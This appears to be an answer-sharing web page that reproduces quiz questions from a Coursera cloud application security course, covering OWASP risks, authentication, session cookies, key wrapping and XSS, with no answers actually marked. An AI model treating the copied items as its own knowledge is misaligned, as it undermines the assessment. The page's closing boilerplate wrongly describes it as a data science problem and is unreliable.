Cloud Application Security Coursera Quiz Answers

Get Cloud Application Security Coursera Quiz Answers

After completing the course, the student should be able to do the following:

● List and describe the OWASP Top 10 vulnerabilities.

● Identify methods to provide cloud security assurance as part of the development life cycle, e.g. in a continuous delivery environment.

● List and describe the different types of virtualization or sandboxing used to protect cloud applications at either the server or client.

● Describe the application of authentication factors and federated identity solutions in cloud client and server authentication.

● Given a cloud application, explain where and how the necessary crypto keys, passwords, and other security secrets should be stored and distributed.

Enroll on Coursera

Week 1: Application Security Risks

Quiz: Module 1

Q1. Letters, telegrams, and other messages can sit in a pile to await delivery. Is there a way to do that with a circuit-oriented phone system?

  • No, because there is no way to “save” a two-way telephone conversation.
  • Yes, if the phone being called has a way to record a message spoken by the caller
  • No, because telephone systems were analog and practical storage is digital.
  • Yes, the phone company attached analog recorders to all phone lines for saving messages

Q2. Which of the following were true about both the ARPANET and ALOHANET? Select all that apply.

  • Both transmitted data in digital packets
  • Both provided reliable packet delivery to the connected host computers
  • Both were designed to support message oriented transmission
  • Both used analog communications links between endpoints

Q3. Each entry in the National Vulnerability Database has a one-to-one relationship to entries in which of the following databases?

  • CVE
  • CWE
  • OWASP Top Ten
  • MITRE

Q4. How does an injection attack work in general? Pick the best explanation.

  • A user mistypes a text entry and causes a database to crash
  • An attacker uses a trial-and-error attack to find valid credentials to log in to a site. The attack uses a database of user IDs and passwords
  • An attacker sends specially designed text to a server, which the server assumes is a simple text parameter. The text passes through command interpreters that misinterpret its contents as commands
  • An attacker uses SQL command syntax to trick the login process. Instead of providing the correct password, the command syntax indicates that a guessed password is correct by using a logical expression

Q5. Which of the following are authentication problems, as opposed to session problems? Select all that apply.

  • Users receive emails claiming to be from the HR department, demanding that they log in and verify personal information. The login is bogus and steals their login credentials
  • Credential stuffing attack
  • A user visits a retail web site and finds the shopping cart already full, with name and address already filled out. The name and address do not belong to the user
  • A user logs in to a retail web site and puts items in the shopping cart. Somehow an attacker takes over the shopping cart, orders merchandise, and addresses the delivery elsewhere

Q6. Are failures to limit transaction rates the same as DDOS attacks, like flooding? Choose the best answer.

  • Yes, because both overwhelm the server with traffic it can’t possibly handle.
  • No, because the server can, by design, limit transaction rates and manage resources so that service is still provided.

Q7. Why do security configuration guidelines tell site administrators to disable, change, or restrict access to built-in user IDs wherever possible?

  • Popular built-in user IDs always appear in “credential stuffing” databases
  • It’s often necessary to provide a ‘back door’ login in a production system for debugging purposes, and such accounts should use hard-to-guess names
  • The administrator reduces the amount of system information visible to outsiders by changing the names

Q8. Which of the following are recognized types of XSS attacks? Select all that apply.

  • Stored XSS
  • Reflected XSS
  • Plugin XSS
  • Backdoor XSS

Q9. Which of the following could contain a significant deserialization risk? Select all that apply.

  • The server reads in an XML file stored with the server’s source code.
  • The server reads an XML file uploaded from the client.
  • Data is collected in a web form and saved directly into a JSON object that is sent to the server. The server reads the JSON into an object on the server.
  • The server creates JSON objects to associate user IDs with access rights to other objects. The JSON objects are saved in files on the server’s own, controlled storage area

Q10. In 2017, major software flaws reported and patched in two major software components: Apache Struts and Windows SMB. Which of the following are true about these patches?

  • A large series of attacks took place before the patches were released.
  • A large series of attacks took place within days of releasing the Apache Struts patch.
  • A large series of attacks took place within months of releasing the Apache Struts patch.
  • A large series of attacks took place within days of releasing the Windows SMB patch.
  • A large series of attacks took place within months of releasing the Windows SMB patch.

Week 2: Architecture and Authentication

Quiz: Module 2

Q1. Which of the following are kept secret to ensure accurate authentication? Select all that apply.

  • Authentication secret
  • Credential
  • Factor
  • User ID

Q2. What is the difference between a credential and an authentication secret?

  • An authentication secret is used in one authentication operation while the credential is used over a long period of time.
  • A credential is a physical badge while an authentication secret is computer data.
  • A credential is used in one authentication operation while the authentication secret is used over a long period of time.
  • There is no difference: both contain exactly the same data.

Q3. This is an old-style ATM cash card that did not contain a smart card chip. Which of the following best describes it in terms of authentication factors?

  • One weak factor: the card
  • Two weak factors: the card + a PIN
  • Three strong factors: the card + a PIN + the card’s owner
  • Two strong factors: the card + a PIN

Q4. Which of the following provide a strong one-time passcode mechanism? Select all that apply.

  • A smart phone with one-time passcode software.
  • The mag stripe on the back of a credit card.
  • A SecurID token
  • A smart phone using SMS to collect a one-time passcode.

Q5. A smart phone unlocks with either a passcode or a biometric reading. Once it’s unlocked, we can use its OTP software to log in to a web site. How many factors are involved to log in to the web site with the phone?

  • Two factors: something you have (the OTP software) and either something you know (the PIN) or something you are (the biometric).
  • Three factors: something you have (the OTP software), something you know (the PIN), and something you are (the biometric).
  • Two factors: something you know (the PIN) and something you are (the biometric)
  • One factor: either something you know (the PIN) or something you are (the biometric)

Q6. We are using a low-entropy passcode to authenticate a handheld device. What can we do to increase its security strength? Select all that apply.

  • Limit the number of unsuccessful passcode guesses allowed
  • Make the passcode shorter
  • Reduce the false acceptance rate
  • Make the passcode longer

Q7. Are biometrics a good choice for remote authentication? Select the best answer.

  • Yes, because their credentials are hard to simulate across a network link.
  • Yes, because the corresponding human features are almost impossible for attackers to copy.
  • No, because biometric authentication either matches perfectly or not at all.
  • No, because they are especially vulnerable to replay attacks.

Q8. Why are authentication devices like one-time password tokens and compatible smartphone-based methods considered stronger than other techniques?

  • The devices carry an extremely large authentication secret that defies attempts at trial-and-error guessing.
  • One-time password mechanisms are themselves immune to trial-and-error attacks.
  • Physical devices always provide a stronger authentication mechanism.

Q9. How does the software architecture REST address security?

  • The architecture assumes that the modeled services are protected by security measures wrapped around the services.
  • Security is enforced through the CRUD API definitions.
  • Sessions are explicitly represented in the architectural model
  • Generic data states, like those described in Course 2, are made part of the architectural model.

Q10. Service security relies on which of the following features? Select all that apply.

  • Authenticated sessions
  • Client authentication with SSL/TLS
  • Statelessness
  • Server authentication with SSL/TLS

Week 3: Session Management

Quiz: Module 3

Q1. This session ID is not tied to a particular user ID. Which of the following terms best describes it?

  • Permissive
  • Strict
  • Anonymous
  • Authenticated

Q2. This session ID was provided by the user to the server. Which of the following terms best describes it?

  • Permissive
  • Strict
  • Anonymous
  • Authenticated

Q3. If the session management software renews a session, which of the following are true? Select all that apply.

  • The session always receives a new session ID.
  • The session is always re-authenticated
  • Session communications are encrypted using SSL/TLS
  • The new session ID is derived from the previous session ID

Q4. Which of the following are preferred for sharing session IDs?

  • URL parameters
  • URL arguments
  • HTTP Cookies
  • Proprietary HTTP headers

Q5. Which of the following attributes prevent a session ID from being shared with other sites? Select all that apply.

  • HTTPOnly
  • Secure
  • Domain
  • Path
  • SameSite

Q6. Which of the following situations make a cookie persistent? Select all that apply.

  • Expire attribute
  • Max-Age attribute
  • When the browser exits
  • SameSite attribute

Q7. What is a session fixation attack?

  • The attacker provides the session ID used by the client, and the server accepts permissive session IDs
  • The attacker guesses or intercepts the session ID established by the server
  • The attacker retrieves the session ID using cross-site scripting
  • The attacker changes the Max-Age attribute to an extremely high value

Q8. The users of the application under development are likely to use the application more-or-less continuously during their office hours. The principal risk is sidejacking. Individual computers and mobile devices are locked when idle. Which of the following is the best strategy for handling session expiration?

  • Make the absolute expiration time as high as possible
  • Renew sessions periodically
  • Never expire sessions during office hours
  • Disable timeouts on the client host

Q9. Which of the following methods are recommended for preserving session ID security? Select all that apply.

  • Protect all transmissions containing the session ID with SSL/TLS
  • Use a cryptographically secure random number generator when generating the session ID.
  • The session ID should be no more than 64 bits long.
  • The session ID should contain the user’s ID to protect against hijacking

Q10. Which of the following mechanisms ensure the encryption of the Session ID? Select all that apply

  • Secure attribute
  • HTTPOnly attribute
  • HSTS
  • Don’t mix HTTP and HTTPS on a page, but allow all-HTTP pages

Week 4: Providers, Crypto, and Scripts

Quiz: Module 4

Q1. The video on trusting cloud providers suggests four roles for onsite personnel. Given those suggestions, which of the following tasks are performed by system administrators? Select all that apply.

  • Review security logs and alerts
  • Install or replace software
  • Install or replace hardware
  • Control physical access by other personnel

Q2. The video on trusting cloud providers suggests four roles for onsite personnel. Given those suggestions, which of the following tasks are performed by system operators and monitors? Select all that apply.

  • Install or replace software
  • Control physical access by other personnel
  • Manage network and server operations
  • Review security logs and alerts

Q3. A potential cloud consumer wants to review a cloud provider’s security measures. Which of the following provides the consumer with the most relevant details?

  • SOC 3 report
  • SOC 1 report
  • Security logs
  • SOC 2 report

Q4. Which of the following help a cloud provider ensure “Trust, but verify” onsite? Select all that apply.

  • Separation of duties
  • Protected event logging
  • SOC 3 report
  • Redundant network firewalls

Q5. Which of the following is a crypto key used to encrypt other crypto keys?

  • DEK
  • KMS
  • KEK
  • HSM

Q6. Is there a difference between key encapsulation and key wrapping? Select the best answer below.

  • Yes: encapsulation requires an HSM while wrapping can be performed in RAM.
  • Yes, encapsulation uses a secret key while wrapping uses a public key.
  • Yes: encapsulation uses a public key while wrapping uses a secret key.
  • No, both encrypt a crypto key to make it safe for storage and distribution.

Q7. NIST recommends changing a crypto key periodically if it encrypts a lot of data. What is the maximum recommended “age” for such a key?

  • 6 months
  • 2 years
  • 5 years
  • 1 years

Q8. Which of the following are true of reflected, server-side XSS attacks? Select all that apply.

  • The attack is delivered through a URL containing the malicious script
  • The server executes the attack script
  • The attacker stores the attack script on the server
  • The client executes the attack script
  • The attack uses a malicious script stored on an unsuspecting server host

Q9. What server error is primarily responsible for XSS attacks? Choose the best response.

  • The server fails to authenticate users before accepting text in critical server functions.
  • The server fails to validate text provided by the user before using it in an interpreted command or programming language statement.
  • The server allows non-ASCII characters to be used in web or API service arguments.

Q10. Which of the following performs the “reflection” in an XSS reflection attack. Select the best response.

  • The targeted client
  • The targeted server
  • The attacker’s host computer
  • The host containing the URL the client clicks on.

Q11. In the course video illustrating reflected XSS, the attacker wants to collect session IDs of legitimate logged-in users, and purchase merchandise using the users’ credentials. If a user clicks on the attack URL without logging in first, what is most likely to happen? Select the best answer.

  • The server rejects the attempt to use the search function.
  • The server reflects the script, it executes on the client, and forwards the victim’s logged-in session ID to the attacker
  • The server reflects the script, it executes on the client, and forwards a useless session ID to the attacker
  • The server reflects the script, it executes on the client, and fails because there is no session ID
Conclusion:

I hope this Cloud Application Security Coursera Quiz Answers would be useful for you to learn something new from this problem. If it helped you then don’t forget to bookmark our site for more Coding Solutions.

This Problem is intended for audiences of all experiences who are interested in learning about Data Science in a business context; there are no prerequisites.

Keep Learning!

More Coding Solutions >>

LeetCode Solutions

Hacker Rank Solutions

CodeChef Solutions

Leave a Reply

Your email address will not be published.